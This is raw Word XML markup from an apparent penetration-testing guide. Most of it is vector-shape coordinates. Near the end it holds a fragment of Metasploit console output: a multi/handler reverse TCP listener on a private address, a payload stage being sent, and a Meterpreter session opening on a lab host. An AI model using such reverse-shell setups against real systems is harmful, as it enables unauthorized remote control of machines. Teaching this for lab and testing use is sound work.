121,5071,4121,5070,4121,5070,4121,5069,4121,5068,4121,5068,4121,5067,4121,5066,4121,5065,4121,5065,4121,5064,4121,5063,4121,5062,4121,5061,4121,5060,4121,5059,4121,5058,4121,5057,4121,5056,4121,5055,4121,5054,4121,5053,4121,5052,4121,5050,4121,5049,4121,5048,4121,5046,4121,5045,4121,5044,4121,5042,4121,5041,4121,5039,4121,5038,4121,5036,4121,5035,4121,5033,4121,5031,4121,5030,4121,5028,4121,5026,4121,5024,4121,5022,4121,5020,4121,5019,4121,5017,4121,5015,4121,5012,4121,5010,4121,5008,4121,5006,4121,5004,4121,5001,4121,4999,4121,4997,4121,4994,4121,4992,4121,4989,4121,4987,4121,4984,4121,4981,4121,4979,4121,4976,4121,4973,4121,4970,4121,4967,4121,4965,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4121,4961,4120,4961,4120,4961,4120,4961,4120,4961,4120,4961,4120,4961,4119,4961,4119,4961,4119,4961,4119,4961,4118,4961,4118,4961,4118,4961,4117,4961,4117,4961,4117,4961,4116,4961,4116,4961,4115,4961,4115,4961,4114,4961,4113,4961,4113,4961,4112,4961,4111,4961,4111,4961,4110,4961,4109,4961,4108,4961,4107,4961,4106,4961,4105,4961,4104,4961,4103,4961,4102,4961,4101,4961,4100,4961,4099,4961,4097,4961,4096,4961,4094,4961,4093,4961,4092,4961,4090,4961,4088,4961,4087,4961,4085,4961,4083,4961,4081,4961,4079,4961,4078,4961,4076,4961,4073,4961,4071,4961,4069,4961,4067,4961,4065,4961,4062,4961,4060,4961,4057,4961,4055,4961,4052,4961,4049,4961,4046,4961,4044,4961,4041,4961,4038,4961,4034,4961,4031,4961,4028,4961,4025,4961,4021,4961,4018,4961,4014,4961,4011,4961,4007,4961,4003,4961,3999,4961,3995,4961,3991,4961,3987,4961,3983,4961,3979,4961,3974,4961,3970,4961,3965,4961,3960,4961,3956,4961,3951,4961,3946,4961,3941,4961,3936,4961,3930,4961,3925,4961,3920,4961,3914,4961,3908,4961,3903,4961,3897,4961,3891,4961,3885,4961,3879,4961,3872,4961,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:265.500pt;margin-top:192.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5310,3850" coordsize="130,270">
        <v:shape style="position:absolute;left:5310;top:3850;width:130;height:270" coordorigin="5310,3850" coordsize="130,270" path="m5322,3866l5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5322,3866,5323,3866,5323,3866,5323,3866,5323,3866,5323,3866,5323,3866,5323,3866,5324,3866,5324,3866,5324,3866,5324,3866,5324,3866,5325,3866,5325,3866,5325,3866,5326,3866,5326,3866,5326,3866,5327,3866,5327,3866,5327,3866,5328,3866,5328,3866,5329,3866,5329,3866,5330,3866,5330,3866,5331,3866,5331,3866,5332,3866,5332,3866,5333,3866,5334,3866,5334,3866,5335,3866,5336,3866,5336,3866,5337,3866,5338,3866,5339,3866,5339,3866,5340,3866,5341,3866,5342,3866,5343,3866,5344,3866,5345,3866,5346,3866,5347,3866,5348,3866,5349,3866,5351,3866,5352,3866,5353,3866,5354,3866,5355,3866,5357,3866,5358,3866,5360,3866,5361,3866,5362,3866,5364,3866,5365,3866,5367,3866,5369,3866,5370,3866,5372,3866,5374,3866,5375,3866,5377,3866,5379,3866,5381,3866,5383,3866,5385,3866,5387,3866,5389,3866,5391,3866,5393,3866,5395,3866,5397,3866,5400,3866,5402,3866,5404,3866,5407,3866,5409,3866,5411,3866,5414,3866,5417,3866,5419,3866,5422,3866,5424,3866,5427,3866,5430,3866,5433,3866,5436,3866,5439,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3866,5442,3867,5442,3867,5442,3867,5442,3867,5442,3867,5442,3867,5442,3868,5442,3868,5442,3868,5442,3868,5442,3869,5442,3869,5442,3869,5442,3870,5442,3870,5442,3870,5442,3871,5442,3871,5442,3872,5442,3872,5442,3873,5442,3874,5442,3874,5442,3875,5442,3876,5442,3876,5442,3877,5442,3878,5442,3879,5442,3880,5442,3881,5442,3882,5442,3883,5442,3884,5442,3885,5442,3886,5442,3887,5442,3888,5442,3890,5442,3891,5442,3893,5442,3894,5442,3895,5442,3897,5442,3899,5442,3900,5442,3902,5442,3904,5442,3906,5442,3908,5442,3909,5442,3911,5442,3914,5442,3916,5442,3918,5442,3920,5442,3922,5442,3925,5442,3927,5442,3930,5442,3932,5442,3935,5442,3938,5442,3941,5442,3943,5442,3946,5442,3949,5442,3953,5442,3956,5442,3959,5442,3962,5442,3966,5442,3969,5442,3973,5442,3976,5442,3980,5442,3984,5442,3988,5442,3992,5442,3996,5442,4000,5442,4004,5442,4008,5442,4013,5442,4017,5442,4022,5442,4027,5442,4031,5442,4036,5442,4041,5442,4046,5442,4051,5442,4057,5442,4062,5442,4067,5442,4073,5442,4079,5442,4084,5442,4090,5442,4096,5442,4102,5442,4108,5442,4115,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5442,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5441,4121,5440,4121,5440,4121,5440,4121,5440,4121,5440,4121,5440,4121,5439,4121,5439,4121,5439,4121,5439,4121,5438,4121,5438,4121,5438,4121,5438,4121,5437,4121,5437,4121,5436,4121,5436,4121,5436,4121,5435,4121,5435,4121,5434,4121,5434,4121,5433,4121,5433,4121,5432,4121,5432,4121,5431,4121,5431,4121,5430,4121,5429,4121,5429,4121,5428,4121,5427,4121,5426,4121,5426,4121,5425,4121,5424,4121,5423,4121,5422,4121,5421,4121,5420,4121,5419,4121,5418,4121,5417,4121,5416,4121,5415,4121,5414,4121,5413,4121,5412,4121,5410,4121,5409,4121,5408,4121,5407,4121,5405,4121,5404,4121,5402,4121,5401,4121,5400,4121,5398,4121,5396,4121,5395,4121,5393,4121,5392,4121,5390,4121,5388,4121,5386,4121,5384,4121,5383,4121,5381,4121,5379,4121,5377,4121,5375,4121,5373,4121,5370,4121,5368,4121,5366,4121,5364,4121,5362,4121,5359,4121,5357,4121,5354,4121,5352,4121,5349,4121,5347,4121,5344,4121,5342,4121,5339,4121,5336,4121,5333,4121,5331,4121,5328,4121,5325,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4121,5322,4120,5322,4120,5322,4120,5322,4120,5322,4120,5322,4120,5322,4119,5322,4119,5322,4119,5322,4119,5322,4118,5322,4118,5322,4118,5322,4117,5322,4117,5322,4117,5322,4116,5322,4116,5322,4115,5322,4115,5322,4114,5322,4113,5322,4113,5322,4112,5322,4111,5322,4111,5322,4110,5322,4109,5322,4108,5322,4107,5322,4106,5322,4105,5322,4104,5322,4103,5322,4102,5322,4101,5322,4100,5322,4099,5322,4097,5322,4096,5322,4094,5322,4093,5322,4092,5322,4090,5322,4088,5322,4087,5322,4085,5322,4083,5322,4081,5322,4079,5322,4078,5322,4076,5322,4073,5322,4071,5322,4069,5322,4067,5322,4065,5322,4062,5322,4060,5322,4057,5322,4055,5322,4052,5322,4049,5322,4046,5322,4044,5322,4041,5322,4038,5322,4034,5322,4031,5322,4028,5322,4025,5322,4021,5322,4018,5322,4014,5322,4011,5322,4007,5322,4003,5322,3999,5322,3995,5322,3991,5322,3987,5322,3983,5322,3979,5322,3974,5322,3970,5322,3965,5322,3960,5322,3956,5322,3951,5322,3946,5322,3941,5322,3936,5322,3930,5322,3925,5322,3920,5322,3914,5322,3908,5322,3903,5322,3897,5322,3891,5322,3885,5322,3879,5322,3872,5322,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:343.500pt;margin-top:192.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6870,3850" coordsize="130,270">
        <v:shape style="position:absolute;left:6870;top:3850;width:130;height:270" coordorigin="6870,3850" coordsize="130,270" path="m6882,3866l6882,3866,6882,3866,6882,3866,6882,3866,6882,3866,6882,3866,6882,3866,6882,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6883,3866,6884,3866,6884,3866,6884,3866,6884,3866,6884,3866,6884,3866,6885,3866,6885,3866,6885,3866,6885,3866,6886,3866,6886,3866,6886,3866,6886,3866,6887,3866,6887,3866,6887,3866,6888,3866,6888,3866,6889,3866,6889,3866,6889,3866,6890,3866,6890,3866,6891,3866,6891,3866,6892,3866,6892,3866,6893,3866,6894,3866,6894,3866,6895,3866,6896,3866,6896,3866,6897,3866,6898,3866,6899,3866,6899,3866,6900,3866,6901,3866,6902,3866,6903,3866,6904,3866,6905,3866,6906,3866,6907,3866,6908,3866,6909,3866,6910,3866,6911,3866,6913,3866,6914,3866,6915,3866,6916,3866,6918,3866,6919,3866,6920,3866,6922,3866,6923,3866,6925,3866,6926,3866,6928,3866,6929,3866,6931,3866,6933,3866,6934,3866,6936,3866,6938,3866,6940,3866,6942,3866,6944,3866,6946,3866,6947,3866,6950,3866,6952,3866,6954,3866,6956,3866,6958,3866,6960,3866,6963,3866,6965,3866,6967,3866,6970,3866,6972,3866,6975,3866,6977,3866,6980,3866,6983,3866,6985,3866,6988,3866,6991,3866,6994,3866,6997,3866,7000,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3866,7003,3867,7003,3867,7003,3867,7003,3867,7003,3867,7003,3867,7003,3868,7003,3868,7003,3868,7003,3868,7003,3869,7003,3869,7003,3869,7003,3870,7003,3870,7003,3870,7003,3871,7003,3871,7003,3872,7003,3872,7003,3873,7003,3874,7003,3874,7003,3875,7003,3876,7003,3876,7003,3877,7003,3878,7003,3879,7003,3880,7003,3881,7003,3882,7003,3883,7003,3884,7003,3885,7003,3886,7003,3887,7003,3888,7003,3890,7003,3891,7003,3893,7003,3894,7003,3895,7003,3897,7003,3899,7003,3900,7003,3902,7003,3904,7003,3906,7003,3908,7003,3909,7003,3911,7003,3914,7003,3916,7003,3918,7003,3920,7003,3922,7003,3925,7003,3927,7003,3930,7003,3932,7003,3935,7003,3938,7003,3941,7003,3943,7003,3946,7003,3949,7003,3953,7003,3956,7003,3959,7003,3962,7003,3966,7003,3969,7003,3973,7003,3976,7003,3980,7003,3984,7003,3988,7003,3992,7003,3996,7003,4000,7003,4004,7003,4008,7003,4013,7003,4017,7003,4022,7003,4027,7003,4031,7003,4036,7003,4041,7003,4046,7003,4051,7003,4057,7003,4062,7003,4067,7003,4073,7003,4079,7003,4084,7003,4090,7003,4096,7003,4102,7003,4108,7003,4115,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7003,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7002,4121,7001,4121,7001,4121,7001,4121,7001,4121,7001,4121,7001,4121,7000,4121,7000,4121,7000,4121,7000,4121,6999,4121,6999,4121,6999,4121,6999,4121,6998,4121,6998,4121,6998,4121,6997,4121,6997,4121,6996,4121,6996,4121,6996,4121,6995,4121,6995,4121,6994,4121,6994,4121,6993,4121,6993,4121,6992,4121,6991,4121,6991,4121,6990,4121,6989,4121,6989,4121,6988,4121,6987,4121,6986,4121,6986,4121,6985,4121,6984,4121,6983,4121,6982,4121,6981,4121,6980,4121,6979,4121,6978,4121,6977,4121,6976,4121,6975,4121,6974,4121,6972,4121,6971,4121,6970,4121,6969,4121,6967,4121,6966,4121,6965,4121,6963,4121,6962,4121,6960,4121,6959,4121,6957,4121,6956,4121,6954,4121,6952,4121,6951,4121,6949,4121,6947,4121,6945,4121,6943,4121,6941,4121,6939,4121,6938,4121,6935,4121,6933,4121,6931,4121,6929,4121,6927,4121,6925,4121,6922,4121,6920,4121,6918,4121,6915,4121,6913,4121,6910,4121,6908,4121,6905,4121,6902,4121,6900,4121,6897,4121,6894,4121,6891,4121,6888,4121,6885,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4121,6882,4120,6882,4120,6882,4120,6882,4120,6882,4120,6882,4120,6882,4119,6882,4119,6882,4119,6882,4119,6882,4118,6882,4118,6882,4118,6882,4117,6882,4117,6882,4117,6882,4116,6882,4116,6882,4115,6882,4115,6882,4114,6882,4113,6882,4113,6882,4112,6882,4111,6882,4111,6882,4110,6882,4109,6882,4108,6882,4107,6882,4106,6882,4105,6882,4104,6882,4103,6882,4102,6882,4101,6882,4100,6882,4099,6882,4097,6882,4096,6882,4094,6882,4093,6882,4092,6882,4090,6882,4088,6882,4087,6882,4085,6882,4083,6882,4081,6882,4079,6882,4078,6882,4076,6882,4073,6882,4071,6882,4069,6882,4067,6882,4065,6882,4062,6882,4060,6882,4057,6882,4055,6882,4052,6882,4049,6882,4046,6882,4044,6882,4041,6882,4038,6882,4034,6882,4031,6882,4028,6882,4025,6882,4021,6882,4018,6882,4014,6882,4011,6882,4007,6882,4003,6882,3999,6882,3995,6882,3991,6882,3987,6882,3983,6882,3979,6882,3974,6882,3970,6882,3965,6882,3960,6882,3956,6882,3951,6882,3946,6882,3941,6882,3936,6882,3930,6882,3925,6882,3920,6882,3914,6882,3908,6882,3903,6882,3897,6882,3891,6882,3885,6882,3879,6882,3872,6882,3866e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:227.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,4550" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:4550;width:130;height:270" coordorigin="3390,4550" coordsize="130,270" path="m3416,4571l3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3416,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3417,4571,3418,4571,3418,4571,3418,4571,3418,4571,3419,4571,3419,4571,3419,4571,3419,4571,3420,4571,3420,4571,3420,4571,3421,4571,3421,4571,3421,4571,3422,4571,3422,4571,3423,4571,3423,4571,3424,4571,3424,4571,3425,4571,3425,4571,3426,4571,3426,4571,3427,4571,3428,4571,3428,4571,3429,4571,3430,4571,3430,4571,3431,4571,3432,4571,3433,4571,3434,4571,3434,4571,3435,4571,3436,4571,3437,4571,3438,4571,3439,4571,3440,4571,3441,4571,3442,4571,3443,4571,3445,4571,3446,4571,3447,4571,3448,4571,3450,4571,3451,4571,3452,4571,3454,4571,3455,4571,3456,4571,3458,4571,3459,4571,3461,4571,3463,4571,3464,4571,3466,4571,3468,4571,3469,4571,3471,4571,3473,4571,3475,4571,3477,4571,3479,4571,3481,4571,3483,4571,3485,4571,3487,4571,3489,4571,3491,4571,3494,4571,3496,4571,3498,4571,3501,4571,3503,4571,3505,4571,3508,4571,3511,4571,3513,4571,3516,4571,3519,4571,3521,4571,3524,4571,3527,4571,3530,4571,3533,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4571,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4572,3536,4573,3536,4573,3536,4573,3536,4573,3536,4573,3536,4574,3536,4574,3536,4574,3536,4575,3536,4575,3536,4575,3536,4576,3536,4576,3536,4577,3536,4577,3536,4578,3536,4578,3536,4579,3536,4580,3536,4580,3536,4581,3536,4582,3536,4583,3536,4583,3536,4584,3536,4585,3536,4586,3536,4587,3536,4588,3536,4589,3536,4590,3536,4591,3536,4593,3536,4594,3536,4595,3536,4596,3536,4598,3536,4599,3536,4601,3536,4602,3536,4604,3536,4606,3536,4607,3536,4609,3536,4611,3536,4613,3536,4615,3536,4617,3536,4619,3536,4621,3536,4623,3536,4625,3536,4628,3536,4630,3536,4633,3536,4635,3536,4638,3536,4640,3536,4643,3536,4646,3536,4649,3536,4652,3536,4655,3536,4658,3536,4661,3536,4664,3536,4668,3536,4671,3536,4674,3536,4678,3536,4682,3536,4685,3536,4689,3536,4693,3536,4697,3536,4701,3536,4705,3536,4709,3536,4714,3536,4718,3536,4723,3536,4727,3536,4732,3536,4737,3536,4742,3536,4747,3536,4752,3536,4757,3536,4762,3536,4767,3536,4773,3536,4778,3536,4784,3536,4790,3536,4796,3536,4802,3536,4808,3536,4814,3536,4820,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3536,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3535,4826,3534,4826,3534,4826,3534,4826,3534,4826,3534,4826,3533,4826,3533,4826,3533,4826,3533,4826,3532,4826,3532,4826,3532,4826,3532,4826,3531,4826,3531,4826,3531,4826,3530,4826,3530,4826,3529,4826,3529,4826,3528,4826,3528,4826,3527,4826,3527,4826,3526,4826,3526,4826,3525,4826,3525,4826,3524,4826,3523,4826,3523,4826,3522,4826,3521,4826,3520,4826,3520,4826,3519,4826,3518,4826,3517,4826,3516,4826,3515,4826,3514,4826,3513,4826,3512,4826,3511,4826,3510,4826,3509,4826,3508,4826,3507,4826,3506,4826,3505,4826,3503,4826,3502,4826,3501,4826,3499,4826,3498,4826,3496,4826,3495,4826,3494,4826,3492,4826,3490,4826,3489,4826,3487,4826,3486,4826,3484,4826,3482,4826,3480,4826,3478,4826,3477,4826,3475,4826,3473,4826,3471,4826,3469,4826,3467,4826,3465,4826,3462,4826,3460,4826,3458,4826,3456,4826,3453,4826,3451,4826,3449,4826,3446,4826,3444,4826,3441,4826,3438,4826,3436,4826,3433,4826,3430,4826,3427,4826,3425,4826,3422,4826,3419,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4826,3416,4825,3416,4825,3416,4825,3416,4825,3416,4825,3416,4824,3416,4824,3416,4824,3416,4823,3416,4823,3416,4823,3416,4822,3416,4822,3416,4821,3416,4821,3416,4820,3416,4820,3416,4819,3416,4819,3416,4818,3416,4817,3416,4817,3416,4816,3416,4815,3416,4814,3416,4814,3416,4813,3416,4812,3416,4811,3416,4810,3416,4809,3416,4807,3416,4806,3416,4805,3416,4804,3416,4803,3416,4801,3416,4800,3416,4798,3416,4797,3416,4795,3416,4794,3416,4792,3416,4790,3416,4789,3416,4787,3416,4785,3416,4783,3416,4781,3416,4779,3416,4777,3416,4774,3416,4772,3416,4770,3416,4768,3416,4765,3416,4763,3416,4760,3416,4757,3416,4755,3416,4752,3416,4749,3416,4746,3416,4743,3416,4740,3416,4737,3416,4733,3416,4730,3416,4727,3416,4723,3416,4720,3416,4716,3416,4712,3416,4709,3416,4705,3416,4701,3416,4697,3416,4692,3416,4688,3416,4684,3416,4680,3416,4675,3416,4670,3416,4666,3416,4661,3416,4656,3416,4651,3416,4646,3416,4641,3416,4636,3416,4630,3416,4625,3416,4619,3416,4614,3416,4608,3416,4602,3416,4596,3416,4590,3416,4584,3416,4578,3416,4571e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:169.500pt;margin-top:264.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3390,5290" coordsize="130,270">
        <v:shape style="position:absolute;left:3390;top:5290;width:130;height:270" coordorigin="3390,5290" coordsize="130,270" path="m3416,5307l3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3416,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3417,5307,3418,5307,3418,5307,3418,5307,3418,5307,3419,5307,3419,5307,3419,5307,3419,5307,3420,5307,3420,5307,3420,5307,3421,5307,3421,5307,3421,5307,3422,5307,3422,5307,3423,5307,3423,5307,3424,5307,3424,5307,3425,5307,3425,5307,3426,5307,3426,5307,3427,5307,3428,5307,3428,5307,3429,5307,3430,5307,3430,5307,3431,5307,3432,5307,3433,5307,3434,5307,3434,5307,3435,5307,3436,5307,3437,5307,3438,5307,3439,5307,3440,5307,3441,5307,3442,5307,3443,5307,3445,5307,3446,5307,3447,5307,3448,5307,3450,5307,3451,5307,3452,5307,3454,5307,3455,5307,3456,5307,3458,5307,3459,5307,3461,5307,3463,5307,3464,5307,3466,5307,3468,5307,3469,5307,3471,5307,3473,5307,3475,5307,3477,5307,3479,5307,3481,5307,3483,5307,3485,5307,3487,5307,3489,5307,3491,5307,3494,5307,3496,5307,3498,5307,3501,5307,3503,5307,3505,5307,3508,5307,3511,5307,3513,5307,3516,5307,3519,5307,3521,5307,3524,5307,3527,5307,3530,5307,3533,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5307,3536,5308,3536,5308,3536,5308,3536,5308,3536,5308,3536,5309,3536,5309,3536,5309,3536,5309,3536,5310,3536,5310,3536,5310,3536,5311,3536,5311,3536,5312,3536,5312,3536,5313,3536,5313,3536,5314,3536,5314,3536,5315,3536,5316,3536,5316,3536,5317,3536,5318,3536,5319,3536,5320,3536,5320,3536,5321,3536,5322,3536,5323,3536,5324,3536,5326,3536,5327,3536,5328,3536,5329,3536,5331,3536,5332,3536,5333,3536,5335,3536,5336,3536,5338,3536,5339,3536,5341,3536,5343,3536,5345,3536,5346,3536,5348,3536,5350,3536,5352,3536,5354,3536,5356,3536,5359,3536,5361,3536,5363,3536,5366,3536,5368,3536,5371,3536,5373,3536,5376,3536,5379,3536,5381,3536,5384,3536,5387,3536,5390,3536,5393,3536,5396,3536,5400,3536,5403,3536,5406,3536,5410,3536,5413,3536,5417,3536,5421,3536,5425,3536,5428,3536,5432,3536,5436,3536,5441,3536,5445,3536,5449,3536,5454,3536,5458,3536,5463,3536,5467,3536,5472,3536,5477,3536,5482,3536,5487,3536,5492,3536,5497,3536,5503,3536,5508,3536,5514,3536,5519,3536,5525,3536,5531,3536,5537,3536,5543,3536,5549,3536,5555,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3536,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3535,5562,3534,5562,3534,5562,3534,5562,3534,5562,3534,5562,3533,5562,3533,5562,3533,5562,3533,5562,3532,5562,3532,5562,3532,5562,3532,5562,3531,5562,3531,5562,3531,5562,3530,5562,3530,5562,3529,5562,3529,5562,3528,5562,3528,5562,3527,5562,3527,5562,3526,5562,3526,5562,3525,5562,3525,5562,3524,5562,3523,5562,3523,5562,3522,5562,3521,5562,3520,5562,3520,5562,3519,5562,3518,5562,3517,5562,3516,5562,3515,5562,3514,5562,3513,5562,3512,5562,3511,5562,3510,5562,3509,5562,3508,5562,3507,5562,3506,5562,3505,5562,3503,5562,3502,5562,3501,5562,3499,5562,3498,5562,3496,5562,3495,5562,3494,5562,3492,5562,3490,5562,3489,5562,3487,5562,3486,5562,3484,5562,3482,5562,3480,5562,3478,5562,3477,5562,3475,5562,3473,5562,3471,5562,3469,5562,3467,5562,3465,5562,3462,5562,3460,5562,3458,5562,3456,5562,3453,5562,3451,5562,3449,5562,3446,5562,3444,5562,3441,5562,3438,5562,3436,5562,3433,5562,3430,5562,3427,5562,3425,5562,3422,5562,3419,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5562,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5561,3416,5560,3416,5560,3416,5560,3416,5560,3416,5559,3416,5559,3416,5559,3416,5558,3416,5558,3416,5558,3416,5557,3416,5557,3416,5556,3416,5556,3416,5555,3416,5555,3416,5554,3416,5553,3416,5553,3416,5552,3416,5551,3416,5551,3416,5550,3416,5549,3416,5548,3416,5547,3416,5546,3416,5545,3416,5544,3416,5543,3416,5542,3416,5541,3416,5539,3416,5538,3416,5537,3416,5535,3416,5534,3416,5532,3416,5531,3416,5529,3416,5527,3416,5526,3416,5524,3416,5522,3416,5520,3416,5518,3416,5516,3416,5514,3416,5512,3416,5510,3416,5508,3416,5505,3416,5503,3416,5500,3416,5498,3416,5495,3416,5493,3416,5490,3416,5487,3416,5484,3416,5481,3416,5478,3416,5475,3416,5472,3416,5469,3416,5465,3416,5462,3416,5459,3416,5455,3416,5451,3416,5448,3416,5444,3416,5440,3416,5436,3416,5432,3416,5428,3416,5424,3416,5419,3416,5415,3416,5410,3416,5406,3416,5401,3416,5396,3416,5391,3416,5387,3416,5381,3416,5376,3416,5371,3416,5366,3416,5360,3416,5355,3416,5349,3416,5343,3416,5337,3416,5332,3416,5325,3416,5319,3416,5313,3416,5307e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:402.600pt;width:343.800pt;height:335.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId29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89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46" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="5511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1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msf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exploit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multi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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)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exploit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2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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3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Started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reverse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TCP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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>on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192.168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.1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.5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53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4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Sending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stage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(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179779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bytes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)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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to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192.168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.1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.119</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="3710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5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Meterpreter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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session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4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opened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(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192.168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.1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.5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53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192.168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.1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.119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3887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)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at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2019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‐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01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27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14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30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27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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="137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-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
